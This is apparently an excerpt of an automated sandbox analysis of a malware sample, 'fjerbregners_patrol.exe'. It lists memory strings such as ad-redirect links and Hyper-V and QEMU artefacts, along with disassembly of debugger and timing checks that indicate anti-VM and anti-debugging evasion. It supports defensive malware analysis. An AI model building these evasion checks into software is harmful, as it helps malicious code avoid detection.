        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <li><a href="http://explorefreeresults.com/10_Best_Fully_Guided_Tours_in_Italy.cfm?domain=ladakhzesmo.com&fp=kXTqzi8r3yObxdW3h%2BgrP6mu1hUU9pjcjOcJod9ispghXmSjx7X9afCbUljKyyzVQSHPhGD5mmUw5keCukQomdDJqBLm7jFTez%2B7z8Aivgw4mj5iTAGZXRbKHWxmAa11GrhbKDqSPdOSpJPzZSadhsmKnO3gfBSpmnBvp3JL5rdh5Zky%2B3sWYm1BwJC8m%2Fq1nmjkPc6YPdvH7RN2wJ1KI9GYWqFztpnxi0R5hby4%2FVqkNnQCp1W1z0YxCt3QhUCiXGUM8mRNfTiO8g%2B8IaQuzuJG4SHWfh74VtXC3x0t%2Bym%2FBr7iLpvSKzVTRHgoPStx&yep=nQER3ifmRou6zzjCJLuWRsT1ctTb58MCwfahHhhaAYE868AXyZBZnHC%2BMqB47jeqg9zkzh9gkIQnZi3ZbzLw0ZUZd5qDV7AfO9xwPJ4jJmQemuYfE8hQHcOcFOhOQGoug6cJMr6j04EcPdu6%2F8Vytc4AN6dA%2FBG3PM20oWuIh%2BfjC8nVNy4%2ByTjrmcRDnuhwpMKhhBQL7Pclnemf8pgTULOze%2BqMz6qFhpf35Kae8rzt5seosif9bXt6p16%2BGyqlaoG%2F%2Fc0zR8IGXUVEysoyfC2gmZ4eWR4xOyTGnc9xf1Hem9cQGWwyDMS3KbaT5xQuwNytbNGwlqfPBBnQ%2F3J8wBvBP0TtmLeUfXurSyyApf%2BBx3JR1EUkQT3vGMY%2F8WffGSV9mb%2Bi8lsDSwjm7VjykkFs6osweZjgJgFhbvEQSnSTlqZaZLoOIOtEj65Gi7ZsPxXtnFq4pBtZlQ%2FwaiF3dxnty0qFlpObE8Y77WP9hW%2BaYw%2B9M%2B9Vw5yEwdYZ1ASBL1sxn%2FD4TzZx0dRW%2FlpmHR1KbCUFamyMPy02ksvL7o1HfO%2FVyho%2FPPVR85%2FdLbmhBhts7xCp9Sx7WMnfXRHlFT2UJ9lZZS%2FK4qVFlCvUKOdHiZk0zBl2hoAcJA9u3XBHwjm1OTG9WSGLKwdjbCeUOLcNachM45BqLCew%2FDFQfWFxZKstOU6dO0M0fBAc5EpywGLpLo2UmbLy43Tgfq1BxaCrqC4mPh21yHZNDf0o2zzf3C0oOH8Z7aMkjoaSDN1xQSSPFVi26pwM3EnjKDWZ%2Bwg6bmkzSircN0kf1zmqvjdNzZlrRPN5hVF8p8hPVZLQ%2FywHw6MqACw1QQE6HXvEuzI1sbQ5C9Do4UylTqVvnBAaEsR20Da0wnOwbQNnCI5uw%2FcbKQ1eH%2BL8YqtJnRFgXqtweKTIlXkcyFyNP62Ct288Ep%2FWHtr%2B9jehQI9OHKzkooloLR5wIgPbPNRedosxeKaqipHLWkZO2CqZ47wUZVdGmzKlpDCx1vqkUy9jRQcK1WgeoXTJqszXazTDS7PrkZeMecbs4xY9ZG22kPaNyQ8bK4JzFWrJviX7LZq9Jm56tkvinYq%2FV2q4HFgVkcy4TIjluXqBQR7OaXrhQDSOmjHLwhWNwChUSsZbwtLZAsZzOxrQGx9Rmj1j9ZJ%2BSiblIuGiL8BMAUitqWGZakTj%2Ffw1M0f9GM7ulv0xQX%2FUj96YBFUFUu3hJNXw6HBXlTo3zQ6ujOxZFCEQSCUk0TwvOVSOT2BtIGJ2GDzhVe%2B1gYil9edSkuaNY17srGqc5dHektOstDTCR7n948DZT83pBARS2DoZUvWvdfa4gItupQDmv%2BOn5uTftwxpXKHXUBovkfHlwNtQAbRUnMsW3NGRXdOdVBk65j3AamJibjVZAKO%2B4tyMAgXCrHcBfgIg2TTCMdbsqCn4DOngU4yAsp6O5aCtOEkeImKtnwrwTr7Dg4ddz%2FwpYpbuXsP2hXxurHM9cpYbBGYay7kV0rEFP5uSwNWi6PbM%2Fthh3uzwnDkfyv6F&gtnp=0&gtpp=0&kbetu=1&kld=1061&yprpnd=UHM6ofc%2BmzTMdphcWy%2Bzzw%3D%3D&_opnslfp=1&bkt=14894&d_bkt=14894&skpc=1&&gtnp=0&gtpp=0&kt=339&&kbc=ladakh+tours&ki=351456101&ktd=256&kld=1061&kp=1" target="_top" onmouseover="changeStatus('10 Best Fully Guided Tours in Italy');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showPop) != 'undefined')showPop=0;return modifyKeywordClickURL(this, 'kwclk');;" title="10 Best Fully Guided Tours in Italy" id="dk1" name="dk1" >10 Best Fully Guided Tours in Italy</a></li>
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: explorer.exe, 00000005.00000000.4265412903.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4935000339.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5577510077.0000000009306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
        Source: fjerbregners_patrol.exe, 00000000.00000002.3672501965.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780737667.0000000003A90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CC:\Program Files\Qemu-ga\qemu-ga.exe
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: fjerbregners_patrol.exe, 00000000.00000002.3708078819.0000000006FD9000.00000004.00000800.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: fjerbregners_patrol.exe, 00000002.00000002.3781933963.0000000005429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <li><a href="http://explorefreeresults.com/Senior_Tours_USA.cfm?domain=ladakhzesmo.com&fp=kXTqzi8r3yObxdW3h%2BgrP6mu1hUU9pjcjOcJod9ispghXmSjx7X9afCbUljKyyzVQSHPhGD5mmUw5keCukQomdDJqBLm7jFTez%2B7z8Aivgw4mj5iTAGZXRbKHWxmAa11GrhbKDqSPdOSpJPzZSadhsmKnO3gfBSpmnBvp3JL5rdh5Zky%2B3sWYm1BwJC8m%2Fq1nmjkPc6YPdvH7RN2wJ1KI9GYWqFztpnxi0R5hby4%2FVqkNnQCp1W1z0YxCt3QhUCiXGUM8mRNfTiO8g%2B8IaQuzuJG4SHWfh74VtXC3x0t%2Bym%2FBr7iLpvSKzVTRHgoPStx&yep=nQER3ifmRou6zzjCJLuWRsT1ctTb58MCwfahHhhaAYE868AXyZBZnHC%2BMqB47jeqg9zkzh9gkIQnZi3ZbzLw0ZUZd5qDV7AfO9xwPJ4jJmQemuYfE8hQHcOcFOhOQGoug6cJMr6j04EcPdu6%2F8Vytc4AN6dA%2FBG3PM20oWuIh%2BfjC8nVNy4%2ByTjrmcRDnuhwpMKhhBQL7Pclnemf8pgTULOze%2BqMz6qFhpf35Kae8rzt5seosif9bXt6p16%2BGyqlaoG%2F%2Fc0zR8IGXUVEysoyfC2gmZ4eWR4xOyTGnc9xf1Hem9cQGWwyDMS3KbaT5xQuwNytbNGwlqfPBBnQ%2F3J8wBvBP0TtmLeUfXurSyyApf%2BBx3JR1EUkQT3vGMY%2F8WffGSV9mb%2Bi8lsDSwjm7VjykkFs6osweZjgJgFhbvEQSnSTlqZaZLoOIOtEj65Gi7ZsPxXtnFq4pBtZlQ%2FwaiF3dxnty0qFlpObE8Y77WP9hW%2BaYw%2B9M%2B9Vw5yEwdYZ1ASBL1sxn%2FD4TzZx0dRW%2FlpmHR1KbCUFamyMPy02ksvL7o1HfO%2FVyho%2FPPVR85%2FdLbmhBhts7xCp9Sx7WMnfXRHlFT2UJ9lZZS%2FK4qVFlCvUKOdHiZk0zBl2hoAcJA9u3XBHwjm1OTG9WSGLKwdjbCeUOLcNachM45BqLCew%2FDFQfWFxZKstOU6dO0M0fBAc5EpywGLpLo2UmbLy43Tgfq1BxaCrqC4mPh21yHZNDf0o2zzf3C0oOH8Z7aMkjoaSDN1xQSSPFVi26pwM3EnjKDWZ%2Bwg6bmkzSircN0kf1zmqvjdNzZlrRPN5hVF8p8hPVZLQ%2FywHw6MqACw1QQE6HXvEuzI1sbQ5C9Do4UylTqVvnBAaEsR20Da0wnOwbQNnCI5uw%2FcbKQ1eH%2BL8YqtJnRFgXqtweKTIlXkcyFyNP62Ct288Ep%2FWHtr%2B9jehQI9OHKzkooloLR5wIgPbPNRedosxeKaqipHLWkZO2CqZ47wUZVdGmzKlpDCx1vqkUy9jRQcK1WgeoXTJqszXazTDS7PrkZeMecbs4xY9ZG22kPaNyQ8bK4JzFWrJviX7LZq9Jm56tkvinYq%2FV2q4HFgVkcy4TIjluXqBQR7OaXrhQDSOmjHLwhWNwChUSsZbwtLZAsZzOxrQGx9Rmj1j9ZJ%2BSiblIuGiL8BMAUitqWGZakTj%2Ffw1M0f9GM7ulv0xQX%2FUj96YBFUFUu3hJNXw6HBXlTo3zQ6ujOxZFCEQSCUk0TwvOVSOT2BtIGJ2GDzhVe%2B1gYil9edSkuaNY17srGqc5dHektOstDTCR7n948DZT83pBARS2DoZUvWvdfa4gItupQDmv%2BOn5uTftwxpXKHXUBovkfHlwNtQAbRUnMsW3NGRXdOdVBk65j3AamJibjVZAKO%2B4tyMAgXCrHcBfgIg2TTCMdbsqCn4DOngU4yAsp6O5aCtOEkeImKtnwrwTr7Dg4ddz%2FwpYpbuXsP2hXxurH
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 0_2_6EE82288 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6EE82288
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 rdtsc 2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D233D0 mov eax, dword ptr fs:[00000030h]2_2_33D233D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1380 mov eax, dword ptr fs:[00000030h]2_2_33CF1380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1380 mov eax, dword ptr fs:[00000030h]2_2_33CF1380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1380 mov eax, dword ptr fs:[00000030h]2_2_33CF1380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1380 mov eax, dword ptr fs:[00000030h]2_2_33CF1380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1380 mov eax, dword ptr fs:[00000030h]2_2_33CF1380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F380 mov eax, dword ptr fs:[00000030h]2_2_33D0F380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F380 mov eax, dword ptr fs:[00000030h]2_2_33D0F380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F380 mov eax, dword ptr fs:[00000030h]2_2_33D0F380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F380 mov eax, dword ptr fs:[00000030h]2_2_33D0F380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F380 mov eax, dword ptr fs:[00000030h]2_2_33D0F380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F380 mov eax, dword ptr fs:[00000030h]2_2_33D0F380
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF38A mov eax, dword ptr fs:[00000030h]2_2_33DAF38A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF93A6 mov eax, dword ptr fs:[00000030h]2_2_33CF93A6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF93A6 mov eax, dword ptr fs:[00000030h]2_2_33CF93A6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB360 mov eax, dword ptr fs:[00000030h]2_2_33CFB360
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB360 mov eax, dword ptr fs:[00000030h]2_2_33CFB360
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB360 mov eax, dword ptr fs:[00000030h]2_2_33CFB360
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB360 mov eax, dword ptr fs:[00000030h]2_2_33CFB360
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB360 mov eax, dword ptr fs:[00000030h]2_2_33CFB360
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB360 mov eax, dword ptr fs:[00000030h]2_2_33CFB360
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE9303 mov eax, dword ptr fs:[00000030h]2_2_33CE9303
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE9303 mov eax, dword ptr fs:[00000030h]2_2_33CE9303
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF30A mov eax, dword ptr fs:[00000030h]2_2_33DAF30A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7330C mov eax, dword ptr fs:[00000030h]2_2_33D7330C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7330C mov eax, dword ptr fs:[00000030h]2_2_33D7330C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7330C mov eax, dword ptr fs:[00000030h]2_2_33D7330C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7330C mov eax, dword ptr fs:[00000030h]2_2_33D7330C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC3336 mov eax, dword ptr fs:[00000030h]2_2_33DC3336
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1332D mov eax, dword ptr fs:[00000030h]2_2_33D1332D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D232C0 mov eax, dword ptr fs:[00000030h]2_2_33D232C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D232C0 mov eax, dword ptr fs:[00000030h]2_2_33D232C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D132C5 mov eax, dword ptr fs:[00000030h]2_2_33D132C5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC32C9 mov eax, dword ptr fs:[00000030h]2_2_33DC32C9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CED2EC mov eax, dword ptr fs:[00000030h]2_2_33CED2EC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CED2EC mov eax, dword ptr fs:[00000030h]2_2_33CED2EC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE72E0 mov eax, dword ptr fs:[00000030h]2_2_33CE72E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF7290 mov eax, dword ptr fs:[00000030h]2_2_33CF7290
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF7290 mov eax, dword ptr fs:[00000030h]2_2_33CF7290
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF7290 mov eax, dword ptr fs:[00000030h]2_2_33CF7290
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB2BC mov eax, dword ptr fs:[00000030h]2_2_33DCB2BC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB2BC mov eax, dword ptr fs:[00000030h]2_2_33DCB2BC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB2BC mov eax, dword ptr fs:[00000030h]2_2_33DCB2BC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB2BC mov eax, dword ptr fs:[00000030h]2_2_33DCB2BC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE92AF mov eax, dword ptr fs:[00000030h]2_2_33CE92AF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB92AB mov eax, dword ptr fs:[00000030h]2_2_33DB92AB
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF2AE mov eax, dword ptr fs:[00000030h]2_2_33DAF2AE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D6D250 mov eax, dword ptr fs:[00000030h]2_2_33D6D250
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D6D250 mov ecx, dword ptr fs:[00000030h]2_2_33D6D250
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB124C mov eax, dword ptr fs:[00000030h]2_2_33DB124C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB124C mov eax, dword ptr fs:[00000030h]2_2_33DB124C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB124C mov eax, dword ptr fs:[00000030h]2_2_33DB124C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB124C mov eax, dword ptr fs:[00000030h]2_2_33DB124C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F24A mov eax, dword ptr fs:[00000030h]2_2_33D1F24A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF247 mov eax, dword ptr fs:[00000030h]2_2_33DAF247
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8327E mov eax, dword ptr fs:[00000030h]2_2_33D8327E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8327E mov eax, dword ptr fs:[00000030h]2_2_33D8327E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8327E mov eax, dword ptr fs:[00000030h]2_2_33D8327E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8327E mov eax, dword ptr fs:[00000030h]2_2_33D8327E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8327E mov eax, dword ptr fs:[00000030h]2_2_33D8327E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8327E mov eax, dword ptr fs:[00000030h]2_2_33D8327E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAD270 mov eax, dword ptr fs:[00000030h]2_2_33DAD270
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB273 mov eax, dword ptr fs:[00000030h]2_2_33CEB273
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB273 mov eax, dword ptr fs:[00000030h]2_2_33CEB273
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB273 mov eax, dword ptr fs:[00000030h]2_2_33CEB273
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7B214 mov eax, dword ptr fs:[00000030h]2_2_33D7B214
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7B214 mov eax, dword ptr fs:[00000030h]2_2_33D7B214
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D051C0 mov eax, dword ptr fs:[00000030h]2_2_33D051C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D051C0 mov eax, dword ptr fs:[00000030h]2_2_33D051C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D051C0 mov eax, dword ptr fs:[00000030h]2_2_33D051C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D051C0 mov eax, dword ptr fs:[00000030h]2_2_33D051C0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F1F0 mov eax, dword ptr fs:[00000030h]2_2_33D1F1F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F1F0 mov eax, dword ptr fs:[00000030h]2_2_33D1F1F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF91E5 mov eax, dword ptr fs:[00000030h]2_2_33CF91E5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF91E5 mov eax, dword ptr fs:[00000030h]2_2_33CF91E5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1B1E0 mov eax, dword ptr fs:[00000030h]2_2_33D1B1E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE91F0 mov eax, dword ptr fs:[00000030h]2_2_33CE91F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE91F0 mov eax, dword ptr fs:[00000030h]2_2_33CE91F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31190 mov eax, dword ptr fs:[00000030h]2_2_33D31190
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31190 mov eax, dword ptr fs:[00000030h]2_2_33D31190
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D19194 mov eax, dword ptr fs:[00000030h]2_2_33D19194
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC51B6 mov eax, dword ptr fs:[00000030h]2_2_33DC51B6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D231BE mov eax, dword ptr fs:[00000030h]2_2_33D231BE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D231BE mov eax, dword ptr fs:[00000030h]2_2_33D231BE
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC3157 mov eax, dword ptr fs:[00000030h]2_2_33DC3157
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC3157 mov eax, dword ptr fs:[00000030h]2_2_33DC3157
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC3157 mov eax, dword ptr fs:[00000030h]2_2_33DC3157
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8314A mov eax, dword ptr fs:[00000030h]2_2_33D8314A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8314A mov eax, dword ptr fs:[00000030h]2_2_33D8314A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8314A mov eax, dword ptr fs:[00000030h]2_2_33D8314A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D8314A mov eax, dword ptr fs:[00000030h]2_2_33D8314A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC5149 mov eax, dword ptr fs:[00000030h]2_2_33DC5149
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D4717A mov eax, dword ptr fs:[00000030h]2_2_33D4717A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D4717A mov eax, dword ptr fs:[00000030h]2_2_33D4717A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2716D mov eax, dword ptr fs:[00000030h]2_2_33D2716D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF510D mov eax, dword ptr fs:[00000030h]2_2_33CF510D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF113 mov eax, dword ptr fs:[00000030h]2_2_33CEF113
